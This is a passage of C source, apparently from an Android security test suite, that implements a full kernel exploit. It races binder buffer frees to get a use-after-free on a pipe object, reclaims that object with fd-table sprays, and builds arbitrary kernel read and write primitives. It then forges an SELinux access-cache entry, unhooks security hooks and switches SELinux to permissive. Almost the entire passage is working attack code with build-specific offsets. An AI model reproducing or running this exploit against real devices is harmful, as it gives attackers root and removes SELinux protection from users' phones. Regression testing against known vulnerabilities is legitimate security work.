1059         return (u64)-1;
1060     }
1061     u64 avc = find_adrp_add(seqno);
1062     dbg("avc=%016zx", avc);
1063     return avc;
1064 }
1065 
1066 u32 get_sid() {
1067     u64 real_cred = r64(current + 0x788);
1068     u64 security = r64(real_cred + 0x78);
1069     u32 sid = r32(security + 4);
1070     dbg("sid=%u", sid);
1071     return sid;
1072 }
1073 
1074 struct avc_node {
1075     u32 ssid;
1076     u32 tsid;
1077     u16 tclass;
1078     u16 pad;
1079     u32 allowed;
1080 };
1081 
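// Fabricates an avc_node in the kernel scratch buffer with allowed = ~0 for the
// given (ssid, tsid, tclass) and links it into the matching AVC hash bucket, so
// the next permission check for that triple hits an "allow everything" cache
// entry. The node layout and hash assume the targeted kernel build.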
1082 u64 grant(u64 avc, u32 ssid, u32 tsid, u16 class) {
1083     struct avc_node n;
1084     n.ssid = ssid;
1085     n.tsid = tsid;
1086     n.tclass = class;
1087     n.pad = 0;
1088     n.allowed = ~0u;
1089     u64 node = scratch;
1090     for (int i = 0; i < 9; i++)
1091         w64(node + i * 8, 0);
1092     u64 *src = (u64*)&n;
1093     w64(node, src[0]);
1094     w64(node + 8, src[1]);
1095     int hash = (ssid ^ (tsid<<2) ^ (class<<4)) & 0x1ff;
1096     u64 head = avc + hash * 8;
1097     u64 hl = node + 0x28;
1098     u64 first = r64(head);
1099     w128(hl, first, head);
1100     if (first)
1101         w64(first + 8, hl);
1102     w64(head, hl);
1103     dbg("granted security sid");
1104     return hl;
1105 }
1106 
1107 int enforce() {
1108     int fd = open("/sys/fs/selinux/enforce", O_RDONLY);
1109     if (fd < 0)
1110         return 1;
1111     dbg("enforce=%d", fd);
1112     char buf;
1113     if (read(fd, &buf, 1) != 1)
1114         return 1;
1115     close(fd);
1116     return buf == '1';
1117 }
1118 
1119 void disable_enforce() {
1120     int fd = open("/sys/fs/selinux/enforce", O_WRONLY);
1121     if (fd >= 0) {
1122         write(fd, "0", 1);
1123         close(fd);
1124     }
1125     if (enforce())
1126         fail("failed to switch selinux to permissive");
1127     dbg("selinux now permissive");
1128 }
1129 
1130 void disable_selinux() {
1131     if (!enforce()) {
1132         dbg("selinux already permissive");
1133         return;
1134     }
1135     u64 hooks = locate_hooks();
1136     if (hooks == (u64)-1) {
1137         return;
1138     }
1139     u64 avc = locate_avc(hooks);
1140     if (avc == (u64)-1) {
1141         return;
1142     }
1143     unhook(hooks, 0x08); // capable
1144     unhook(hooks, 0x2f); // inode_permission
1145     unhook(hooks, 0x3d); // file_permission
1146     unhook(hooks, 0x49); // file_open
1147     u64 avcnode = grant(avc, get_sid(), 2, 1);
1148     disable_enforce();
1149     hlist_del(avcnode);
1150 }
1151 
1152 #define PIPES 8
1153 #define STAGE2_THREADS 64
1154 
1155 int cpumask;
1156 int cpu1;
1157 int cpu2;
1158 int tot_cpus;
1159 const char *pipedir;
1160 char *pipepath;
1161 char *pipeid;
1162 int pipefd[PIPES];
1163 sync_t *free_sync;
1164 sync_t *poll_sync;
1165 sync_t *stage2_sync1;
1166 sync_t *stage2_sync2;
1167 sync_t *rw_thread_sync;
1168 int bnd1, bnd2;
1169 u32 to1;
1170 u64 free_ptr;
1171 u64 trigger_time;
1172 int total_txns;
1173 int bad_pipe;
1174 int uaf_pipe;
1175 volatile int uaf_alloc_success;
1176 u64 pipe_inode_info;
1177 int rw_thread_tid;
1178 volatile int rw_cmd;
1179 volatile int rw_bit;
1180 volatile int rw_val;
1181 u64 free_data;
1182 u64 next_free_data;
1183 
1184 void select_cpus() {
1185     cpu1 = cpu2 = -1;
1186     for (int i = 7; i >= 0; i--) {
1187         if (do_set_cpu(i) < 0)
1188             continue;
1189         cpumask |= (1 << i);
1190         if (cpu1 < 0)
1191             cpu1 = i;
1192         else if (cpu2 < 0)
1193             cpu2 = i;
1194         tot_cpus++;
1195     }
1196     if (cpu1 < 0 || cpu2 < 0) {
1197         fail("huh, couldn't find 2 cpus");
1198     }
1199     dbg("cpumask=%02x cpu1=%d cpu2=%d", cpumask, cpu1, cpu2);
1200 }
1201 
1202 void rw_thread(u64 idx);
1203 void free_thread(u64 arg);
1204 void poll_thread(u64 arg);
1205 
1206 int cpu_available(int cpu) {
1207     return !!(cpumask & (1 << cpu));
1208 }
1209 
1210 void hog_cpu_thread(u64 arg) {
1211     set_cpu(cpu2);
1212     time_t test_started = start_timer();
1213     while (timer_active(test_started)) {
1214     }
1215 }
1216 
1217 void launch_threads() {
1218     launch_thread("txnuaf.log", log_thread, NULL, 0, 1);
1219     launch_thread("txnuaf.hog", hog_cpu_thread, NULL, 0, 1);
1220     launch_thread("txnuaf.free", free_thread, &free_sync, 0, 1);
1221     launch_thread("txnuaf.poll", poll_thread, &poll_sync, 0, 1);
1222     rw_thread_tid = launch_thread("txnuaf.rw", rw_thread, &rw_thread_sync, 0, 0);
1223 }
1224 
1225 void open_binders() {
1226     u32 xchg;
1227     bnd1 = get_binder(&xchg);
1228     exchg_put_binder(bnd1, xchg);
1229     dec_ref(bnd1, xchg);
1230     bnd2 = get_binder(&xchg);
1231     to1 = exchg_get_binder(bnd2, xchg);
1232     dec_ref(bnd1, xchg);
1233 }
1234 
1235 void make_pipe_path() {
1236     size_t l = strlen(pipedir);
1237     pipepath = malloc(l + 4); // "/pd\0"
1238     strcpy(pipepath, pipedir);
1239     pipepath[l++] = '/';
1240     pipeid = pipepath + l;
1241 }
1242 
1243 int open_pipe(int idx) {
1244     if (!pipepath)
1245         make_pipe_path();
1246     sprintf(pipeid, "p%d", idx);
1247     int fd = open(pipepath, O_RDWR);
1248     if (fd < 0)
1249         fail("pipe open fail");
1250     return fd;
1251 }
1252 
1253 void open_pipes() {
1254     for (int i = 0; i < PIPES; i++)
1255         pipefd[i] = open_pipe(i);
1256 }
1257 
1258 int do_poll(int fd, int timeout) {
1259     struct pollfd pfd;
1260     pfd.fd = fd;
1261     pfd.events = 0;
1262     pfd.revents = 0;
1263     if (poll(&pfd, 1, timeout) < 0)
1264         fail("pipe poll fail");
1265     return pfd.revents;
1266 }
1267 
1268 int find_bad_pipe() {
1269     for (int i = 0; i < PIPES; i++) {
1270         if (do_poll(pipefd[i], 0) & POLLHUP) {
1271             dbg("corrupted pipe at %d", i);
1272             bad_pipe = pipefd[i];
1273             sprintf(pipeid, "p%d", i);
1274             return 1;
1275         }
1276     }
1277     return 0;
1278 }
1279 
1280 void close_pipes() {
1281     for (int i = 0; i < PIPES; i++) {
1282         if (close(pipefd[i]) < 0)
1283             fail("close pipe fail, i=%d fd=%d", i, pipefd[i]);
1284     }
1285 }
1286 
1287 void free_thread(u64 arg) {
1288     set_timerslack();
1289     set_cpu(cpu1);
1290     set_idle();
1291     time_t test_started = start_timer();
1292     while (timer_active(test_started)) {
1293         sync_wait(free_sync);
1294         buf_t *buf = new_buf();
1295         buf_u32(buf, BC_FREE_BUFFER);
1296         buf_uintptr(buf, free_ptr);
1297         struct binder_write_read bwr;
1298         memset(&bwr, 0x00, sizeof(bwr));
1299         bwr.write_buffer = (u64)buf->p;
1300         bwr.write_size = buf->off;
1301         int off = cpu1 < 4 ? 1300 : 350;
1302         u64 target_time = trigger_time - off;
1303         while (time_now() < target_time)
1304             ;
1305         ioctl(bnd1, BINDER_WRITE_READ, &bwr);
1306         free_buf(buf);
1307         sync_done(free_sync);
1308     }
1309 };
1310 
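// Core race loop: send a transaction from bnd2 to bnd1, arm free_thread to
// issue BC_FREE_BUFFER on the received buffer just before trigger_time while
// this thread replies at trigger_time, then immediately open pipes so a
// pipe_inode_info can be allocated over the freed memory. A corrupted pipe
// reports POLLHUP in find_bad_pipe() and ends the loop.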
1311 void race_cycle() {
1312     dbg("race cycle, this may take time...");
1313     time_t test_started = start_timer();
1314     while (timer_active(test_started)) {
1315         send_txn(bnd2, to1, 0, NULL, NULL);
1316         txn_t t1, t2;
1317         recv_txn(bnd1, &t1);
1318         free_ptr = txn_buf(&t1);
1319         trigger_time = time_now() + 100000;
1320         sync_signal(free_sync);
1321         sleep_until(trigger_time);
1322         send_reply(bnd1);
1323         open_pipes();
1324         recv_txn(bnd2, &t2);
1325         free_txn(&t2);
1326         sync_wait_done(free_sync);
1327         if (find_bad_pipe())
1328             break;
1329         close_pipes();
1330     }
1331 }
1332 
1333 void reopen_pipe() {
1334     uaf_pipe = open(pipepath, O_WRONLY);
1335     if (uaf_pipe < 0)
1336         fail("reopen pipe fail");
1337 }
1338 
1339 void stage2_thread(u64 cpu);
1340 
1341 void stage2_launcher(u64 arg) {
1342     dup2(uaf_pipe, 0);
1343     dup2(bnd1, 1);
1344     dup2(bnd2, 2);
1345     for (int i = 3; i < 1024; i++)
1346         close(i);
1347     unshare_following_clone_files();
1348     int cpu_count =  android_getCpuCount();
1349     for (int cpu = 0; cpu < cpu_count; cpu++) {
1350         if (cpu_available(cpu)) {
1351             for (int i = 0; i < STAGE2_THREADS; i++)
1352                 launch_thread("txnuaf.stage2", stage2_thread, NULL, cpu, 0);
1353         }
1354     }
1355 }
1356 
1357 void signal_xpl_threads() {
1358     sync_signal(stage2_sync1);
1359     sync_wait_done(stage2_sync1);
1360     sync_signal(stage2_sync2);
1361     sync_wait_done(stage2_sync2);
1362 }
1363 
1364 void launch_stage2_threads() {
1365     stage2_sync1 = alloc_sync();
1366     stage2_sync2 = alloc_sync();
1367     sync_set_num_waiters(stage2_sync1, STAGE2_THREADS);
1368     sync_set_num_waiters(stage2_sync2, (tot_cpus - 1) * STAGE2_THREADS);
1369     hook_clone();
1370     unshare_following_clone_files();
1371     launch_thread("txnuaf.stage2_launcher", stage2_launcher, NULL, 0, 0);
1372     // set cpu
1373     signal_xpl_threads();
1374 }
1375 
1376 void alloc_txns(int n) {
1377     total_txns += n;
1378     size_t totsz = n * (4 + sizeof(struct binder_transaction_data));
1379     buf_t *buf = new_buf_sz(totsz);
1380     for (int i = 0; i < n; i++) {
1381         buf_u32(buf, BC_TRANSACTION);
1382         struct binder_transaction_data *tr;
1383         tr = buf_alloc(buf, sizeof(*tr));
1384         tr->target.handle = to1;
1385         tr->code = 0;
1386         tr->flags |= TF_ONE_WAY;
1387         tr->data.ptr.buffer = 0;
1388         tr->data.ptr.offsets = 0;
1389         tr->data_size = 0;
1390         tr->offsets_size = 0;
1391     }
1392     binder_write(bnd2, buf);
1393 }
1394 
1395 void recv_all_txns(int fd) {
1396     for (int i = 0; i < total_txns; i++) {
1397         txn_t t;
1398         recv_txn(fd, &t);
1399         free_txn(&t);
1400     }
1401 }
1402 
1403 void clean_slab() {
1404     // clean node
1405     alloc_txns(4096);
1406     // clean each cpu
1407     int cpu_count =  android_getCpuCount();
1408     for (int i = 0; i < cpu_count; i++) {
1409         if (cpu_available(i)) {
1410             set_cpu(i);
1411             alloc_txns(512);
1412         }
1413     }
1414     set_cpu(cpu1);
1415     // for good measure
1416     alloc_txns(128);
1417 }
1418 
1419 void poll_thread(u64 arg) {
1420     set_timerslack();
1421     sync_wait(poll_sync);
1422     do_poll(uaf_pipe, 200);
1423     dbg("poll timeout");
1424     sync_done(poll_sync);
1425 }
1426 
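// Closes the corrupted pipe to free its pipe_inode_info, then drives the
// stage-2 threads (each with a private fd table thanks to the clone hook)
// through two rounds: first expanding their fd tables, then setting every fd
// bit, spraying fd-table allocations in the hope that one reclaims the freed
// object (the "fdmem" spray).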
1427 void free_pipe_alloc_fdmem() {
1428     clean_slab();
1429     sync_signal(poll_sync);
1430     usleep(50000);
1431     if (close(bad_pipe) < 0) {
1432         fail("free close fail");
1433         return;
1434     }
1435     // alloc fdmem
1436     signal_xpl_threads();
1437     // set all bits
1438     signal_xpl_threads();
1439     dbg("fdmem spray done");
1440     sync_wait_done(poll_sync);
1441     recv_all_txns(bnd1);
1442 }
1443 
1444 void find_pipe_slot_thread() {
1445     signal_xpl_threads();
1446     if (!uaf_alloc_success)
1447         fail("inode_info uaf alloc fail - this may sometimes happen, "
1448              "kernel may crash after you close the app");
1449 }
1450 
1451 void set_all_bits() {
1452     for (int i = 0x1ff; i >= 3; i--)
1453         if (dup2(1, i) < 0)
1454             fail("dup2 fail, fd=%d", i);
1455 }
1456 
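// winfo32/winfo64 and rinfo64 below treat the reclaimed allocation (now backing
// a stage-2 thread's fd table, per the fdmem spray above) as raw memory: low
// offsets are written bit-by-bit by opening (dup2) or closing fds, higher
// offsets via the close-on-exec flag (fcntl F_SETFD), and reads rely on
// select() failing with EBADF for clear bits. Offsets are in bytes from the
// start of the old pipe_inode_info.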
1457 void winfo32_lo(int addr, u32 dat) {
1458     int startbit = addr ? 0 : 3;
1459     addr *= 8;
1460     for (int i = startbit; i < 32; i++) {
1461         int fd = addr + i;
1462         if (dat & (1ul << i)) {
1463             if (dup2(1, fd) < 0)
1464                 fail("winfo dup2 fail, fd=%d", fd);
1465         } else {
1466             if (close(fd) < 0 && errno != EBADF)
1467                 fail("winfo close fail, fd=%d", fd);
1468         }
1469     }
1470 }
1471 
1472 void winfo32_hi(int addr, u32 dat) {
1473     addr *= 8;
1474     for (int i = 0; i < 32; i++) {
1475         u32 bit = dat & (1u << i);
1476         int fd = addr + i;
1477         if (fcntl(fd, F_SETFD, bit ? FD_CLOEXEC : 0) < 0) {
1478             if (errno != EBADF || bit)
1479                 fail("winfo fcntl fail fd=%d", fd);
1480         }
1481     }
1482 }
1483 
1484 void winfo32(int addr, u32 dat) {
1485     if (addr < 0x40)
1486         winfo32_lo(addr, dat);
1487     else
1488         winfo32_hi(addr - 0x40, dat);
1489 }
1490 
1491 void winfo64(int addr, u64 dat) {
1492     winfo32(addr, dat);
1493     winfo32(addr + 4, dat >> 32);
1494 }
1495 
1496 u64 rinfo64(int addr) {
1497     addr *= 8;
1498     u64 ret = 0;
1499     for (int i = 0; i < 64; i++) {
1500         int fd = addr + i;
1501         fd_set set;
1502         FD_ZERO(&set);
1503         FD_SET(fd, &set);
1504         struct timeval timeout;
1505         timeout.tv_sec = 0;
1506         timeout.tv_usec = 0;
1507         if (select(fd + 1, &set, NULL, NULL, &timeout) >= 0)
1508             ret |= 1ul << i;
1509         else if (errno != EBADF)
1510             fail("leak select fail");
1511     }
1512     return ret;
1513 }
1514 
1515 int files_off = 0x30;
1516 int file_off = 0x48;
1517 int fdt_off = 0x58;
1518 int fmode_off = 0x78;
1519 int faoff = 0x10;
1520 
1521 void set_pipe_mutex_count(u32 count) {
1522     winfo32(0, count);
1523 }
1524 
1525 void set_pipe_nrbufs(u32 nrbufs) {
1526     winfo32(0x40, nrbufs);
1527 }
1528 
1529 void set_pipe_curbuf(u32 curbuf) {
1530     winfo32(0x44, curbuf);
1531 }
1532 
1533 void set_pipe_buffers(u32 buffers) {
1534     winfo32(0x48, buffers);
1535 }
1536 
1537 void set_pipe_readers(u32 readers) {
1538     winfo32(0x4c, readers);
1539 }
1540 
1541 void set_pipe_fasync_readers(u64 fasync_readers) {
1542     winfo64(0x70, fasync_readers);
1543 }
1544 
1545 void set_pipe_wait_next(u64 next) {
1546     winfo64(0x30, next);
1547 }
1548 
1549 u64 get_pipe_wait_next() {
1550     return rinfo64(0x30);
1551 }
1552 
1553 void set_fa_magic(u32 magic) {
1554     winfo32(faoff + 4, magic);
1555 }
1556 
1557 void set_fa_next(u64 next) {
1558     winfo64(faoff + 0x10, next);
1559 }
1560 
1561 void set_fa_file(u64 file) {
1562     winfo64(faoff + 0x18, file);
1563 }
1564 
1565 u64 get_mutex_owner() {
1566     return rinfo64(0x18);
1567 }
1568 
1569 void set_files_count(int count) {
1570     winfo32(files_off, count);
1571 }
1572 
1573 void set_files_fdt(u64 fdt) {
1574     winfo64(files_off + 0x20, fdt);
1575 }
1576 
1577 void set_fdt_max_fds(u32 max_fds) {
1578     winfo32(fdt_off, max_fds);
1579 }
1580 
1581 void set_fdt_fdarr(u64 fdarr) {
1582     winfo64(fdt_off + 8, fdarr);
1583 }
1584 
1585 void set_fdt_close_on_exec(u64 close_on_exec) {
1586     winfo64(fdt_off + 0x10, close_on_exec);
1587 }
1588 
1589 void set_file_fmode(u32 fmode) {
1590     winfo32(fmode_off, fmode);
1591 }
1592 
1593 void set_file(u64 file) {
1594     winfo64(file_off, file);
1595 }
1596 
1597 void stage2();
1598 
1599 void stage2_thread(u64 cpu) {
1600     sync_t *sync = cpu == cpu1 ? stage2_sync1 : stage2_sync2;
1601     sync_wait(sync);
1602     do_set_cpu(cpu);
1603     sync_done(sync);
1604 
1605     sync_wait(sync);
1606     if (dup2(1, 0x1ff) < 0) {
1607         fail("dup2 fail");
1608         return;
1609     }
1610     sync_done(sync);
1611 
1612     sync_wait(sync);
1613     set_all_bits();
1614     sync_done(sync);
1615 
1616     sync_wait(sync);
1617     u64 wait_list = get_pipe_wait_next();
1618     int ok = wait_list != -1l;
1619     if (ok) {
1620         uaf_alloc_success = 1;
1621         pipe_inode_info = wait_list - 0x30;
1622         dbg("pipe_inode_info=%016zx", pipe_inode_info);
1623     }
1624     sync_done(sync);
1625     if (ok)
1626         stage2();
1627 }
1628 
1629 void write_pipe_ptr_to(u64 addr) {
1630     set_pipe_wait_next(addr - 8);
1631     do_poll(0, 50);
1632 }
1633 
1634 void overwrite_pipe_bufs() {
1635     write_pipe_ptr_to(pipe_inode_info + 0x80);
1636 }
1637 
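// Builds fake pipe and fasync state inside the reclaimed object so that
// rw_thread's write() on the reopened pipe blocks; while it is blocked, the
// field read by get_mutex_owner() leaks a pointer to rw_thread's task_struct.
// Clearing the fasync magic and sending SIGUSR2 then unblocks the writer.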
1638 void leak_task_ptr() {
1639     set_pipe_mutex_count(0x7);
1640     set_pipe_wait_next(pipe_inode_info + 0x30);
1641     u64 faptr = pipe_inode_info + faoff;
1642     set_pipe_fasync_readers(faptr);
1643     set_pipe_nrbufs(3);
1644     set_pipe_curbuf(0);
1645     set_pipe_buffers(4);
1646     set_pipe_readers(1);
1647     set_fa_magic(0x4601);
1648     set_fa_next(faptr);
1649     set_fa_file(0xfffffffful); // overlaps with inode_info.wait.lock
1650     sync_signal(rw_thread_sync);
1651     // wait for rw thread to write mutex owner
1652     usleep(100000);
1653     rw_task = get_mutex_owner();
1654     dbg("rw_task=%016zx", rw_task);
1655     // unblock rw thread
1656     set_fa_magic(0);
1657     if (syscall(SYS_tkill, rw_thread_tid, SIGUSR2) < 0)
1658         fail("tkill fail");
1659     dbg("signaled rw_thread");
1660     sync_wait_done(rw_thread_sync);
1661     // wait until klogd has logged the bad magic number error
1662     sleep(1);
1663 }
1664 
1665 void overwrite_task_files(u64 task) {
1666     write_pipe_ptr_to(task + 0x7c0);
1667 }
1668 
1669 void sigfunc(int a) {
1670 }
1671 
1672 enum {cmd_read, cmd_write, cmd_exit};
1673 
1674 void handle_sig() {
1675     struct sigaction sa;
1676     memset(&sa, 0x00, sizeof(sa));
1677     sa.sa_handler = sigfunc;
1678     if (sigaction(SIGUSR2, &sa, NULL) < 0)
1679         fail("sigaction fail");
1680 }
1681 
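// Helper thread whose task_struct is leaked above. Its first write() blocks on
// the fake "full" pipe until it is signalled; afterwards it serves one-bit
// reads and writes by querying or toggling FD_CLOEXEC on its own (soon to be
// hijacked) fd table, driven through rw_cmd/rw_bit/rw_val.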
1682 void rw_thread(u64 idx) {
1683     handle_sig();
1684     sync_wait(rw_thread_sync);
1685     void *dat = malloc(0x2000);
1686     dbg("starting blocked write");
1687     if (write(uaf_pipe, dat, 0x2000) != 0x1000) {
1688         fail("expected blocking write=0x1000");
1689         return;
1690     }
1691     dbg("write unblocked");
1692     sync_done(rw_thread_sync);
1693     int done = 0;
1694     while (!done) {
1695         sync_wait(rw_thread_sync);
1696         if (rw_cmd == cmd_read) {
1697             int bits = fcntl(rw_bit, F_GETFD);
1698             if (bits < 0) {
1699                 fail("F_GETFD fail");
1700                 return;
1701             }
1702             rw_val = !!(bits & FD_CLOEXEC);
1703         } else if (rw_cmd == cmd_write) {
1704             if (fcntl(rw_bit, F_SETFD, rw_val ? FD_CLOEXEC : 0) < 0) {
1705                 fail("F_SETFD fail");
1706                 return;
1707             }
1708         } else {
1709             done = 1;
1710         }
1711         sync_done(rw_thread_sync);
1712     }
1713 }
1714 
1715 void set_fdarr(int bit) {
1716     set_fdt_fdarr(pipe_inode_info + file_off - bit * 8);
1717 }
1718 
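// Arbitrary kernel read, one byte at a time: point the fake fdtable's
// close_on_exec pointer at the target address, slide the fd array so each
// probed fd maps onto the fake struct file, and have rw_thread report each bit
// via fcntl(F_GETFD). w8() below is the mirror-image write.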
1719 u8 r8(u64 addr) {
1720     u8 val = 0;
1721     set_fdt_close_on_exec(addr);
1722     for (int bit = 0; bit < 8; bit++) {
1723         set_fdarr(bit);
1724         rw_bit = bit;
1725         rw_cmd = cmd_read;
1726         sync_signal(rw_thread_sync);
1727         sync_wait_done(rw_thread_sync);
1728         val |= rw_val << bit;
1729     }
1730     return val;
1731 }
1732 
1733 void w8(u64 addr, u8 val) {
1734     set_fdt_close_on_exec(addr);
1735     for (int bit = 0; bit < 8; bit++) {
1736         set_fdarr(bit);
1737         rw_bit = bit;
1738         rw_val = val & (1 << bit);
1739         rw_cmd = cmd_write;
1740         sync_signal(rw_thread_sync);
1741         sync_wait_done(rw_thread_sync);
1742     }
1743 }
1744 
1745 void exit_rw_thread() {
1746     rw_cmd = cmd_exit;
1747     sync_signal(rw_thread_sync);
1748     sync_wait_done(rw_thread_sync);
1749 }
1750 
1751 void w16(u64 addr, u16 val) {
1752     w8(addr, val);
1753     w8(addr + 1, val >> 8);
1754 }
1755 
1756 void w32(u64 addr, u32 val) {
1757     w16(addr, val);
1758     w16(addr + 2, val >> 16);
1759 }
1760 
1761 void w64(u64 addr, u64 val) {
1762     w32(addr, val);
1763     w32(addr + 4, val >> 32);
1764 }
1765 
1766 u16 r16(u64 addr) {
1767     return r8(addr) | (r8(addr + 1) << 8);
1768 }
1769 
1770 u32 r32(u64 addr) {
1771     return r16(addr) | (r16(addr + 2) << 16);
1772 }
1773 
1774 u64 r64(u64 addr) {
1775     return r32(addr) | (u64)r32(addr + 4) << 32;
1776 }
1777 
1778 #define magic 0x55565758595a5b5cul
1779 
1780 void set_up_arbitrary_rw() {
1781     overwrite_task_files(rw_task);
1782     set_all_bits();
1783     set_files_count(1);
1784     set_files_fdt(pipe_inode_info + fdt_off);
1785     set_fdt_max_fds(8);
1786     set_file(pipe_inode_info + fmode_off - 0x44);
1787     set_file_fmode(0);
1788     u64 magic_addr = scratch;
1789     w64(magic_addr, magic);
1790     if (r64(magic_addr) != magic)
1791         fail("rw test fail");
1792     dbg("got arbitrary rw");
1793 }
1794 
1795 u64 get_current() {
1796     int our_tid = gettid();
1797     u64 leader = r64(rw_task + 0x610);
1798     u64 task = leader;
1799 
1800     time_t test_started = start_timer();
1801     while (timer_active(test_started)) {
1802         int tid = r32(task + 0x5d0);
1803         if (tid == our_tid)
1804             return task;
1805         task = r64(task + 0x680) - 0x680;
1806         if (task == leader)
1807             break;
1808     }
1809     fail("current not found");
1810     return (u64)-1;
1811 }
1812 
1813 void get_fdarr() {
1814     current = get_current();
1815     if (current == (u64)-1) {
1816         return;
1817     }
1818     dbg("current=%016zx", current);
1819     u64 files = r64(current + 0x7c0);
1820     u64 fdt = r64(files + 0x20);
1821     fdarr = r64(fdt + 8);
1822 }
1823 
1824 void place_bnd_buf(u64 v1, u64 v2, txn_t *t) {
1825     txn_t t2;
1826     int do_free = !t;
1827     if (!t)
1828         t = &t2;
1829     buf_t *dat = new_buf();
1830     buf_u64(dat, v1);
1831     buf_u64(dat, v2);
1832     send_txn(2, to1, 0, dat, NULL);
1833     recv_txn(1, t);
1834     if (do_free)
1835         free_txn(t);
1836     send_reply(1);
1837     recv_txn(2, &t2);
1838     free_txn(&t2);
1839 }
1840 
1841 void w128(u64 addr, u64 v1, u64 v2) {
1842     w64(free_data, addr);
1843     w64(next_free_data, addr + 0x10);
1844     place_bnd_buf(v1, v2, NULL);
1845 }
1846 
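// Upgrades to a 16-byte arbitrary write: using r64/w64, locate binder fd 1's
// proc/alloc bookkeeping and redirect its free-buffer records so that the
// payload of the next place_bnd_buf() transaction is copied to a chosen
// address. The 0xd0/0x1c0/0x48/0x58 offsets are specific to the targeted
// kernel build.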
1847 void set_up_w128() {
1848     u64 bnd = get_file(1);
1849     u64 proc = r64(bnd + 0xd0);
1850     u64 alloc = proc + 0x1c0;
1851     enter_looper(1);
1852     txn_t t1, t2;
1853     place_bnd_buf(0, 0, &t1);
1854     place_bnd_buf(0, 0, &t2);
1855     free_txn(&t1);
1856     u64 free_buffer = r64(alloc + 0x48);
1857     u64 next = r64(free_buffer);
1858     w64(alloc + 0x38, 0);
1859     w64(alloc + 0x78, ~0ul);
1860     free_data = free_buffer + 0x58;
1861     next_free_data = next + 0x58;
1862     u64 magic_addr = scratch + 8;
1863     w128(magic_addr, magic, magic);
1864     if (r64(magic_addr) != magic || r64(magic_addr + 8) != magic)
1865         fail("w128 test fail");
1866     dbg("got w128");
1867 }
1868 
1869 void clean_up() {
1870     w64(fdarr, 0);
1871     set_files_count(2);
1872     exit_rw_thread();
1873 }
1874 
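// Stage 1: pin to a CPU, start the helper threads, set up the two binder fds,
// win the free/reply race to corrupt a pipe, reopen it, and launch the stage-2
// threads that will reclaim the freed pipe_inode_info as fd-table memory.
// stage2() below then builds the read/write primitives and flips SELinux to
// permissive.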
1875 void exploit() {
1876     set_thread_name("txnuaf");
1877     select_cpus();
1878     set_cpu(cpu1);
1879     set_timerslack();
1880     launch_threads();
1881     open_binders();
1882     race_cycle();
1883     reopen_pipe();
1884     launch_stage2_threads();
1885     free_pipe_alloc_fdmem();
1886     find_pipe_slot_thread();
1887 }
1888 
1889 void stage2() {
1890     scratch = pipe_inode_info + 0xb8;
1891     overwrite_pipe_bufs();
1892     leak_task_ptr();
1893     set_up_arbitrary_rw();
1894     get_fdarr();
1895     set_up_w128();
1896     winfo32(0, 0x7);
1897     disable_selinux();
1898     clean_up();
1899 }
1900 
1901 JNIEXPORT void JNICALL
1902 Java_android_security_cts_ExploitThread_runxpl(JNIEnv *e, jobject t, jstring jpipedir) {
1903     this = (*e)->NewGlobalRef(e, t);
1904     add_jenv(e);
1905     (*e)->GetJavaVM(e, &jvm);
1906     jclass cls = (*e)->GetObjectClass(e, this);
1907     add_log = (*e)->GetMethodID(e, cls, "addLog", "(Ljava/lang/String;)V");
1908     pipedir = (*e)->GetStringUTFChars(e, jpipedir, NULL);
1909     exploit();
1910     (*e)->ReleaseStringUTFChars(e, jpipedir, pipedir);
1911 }
1912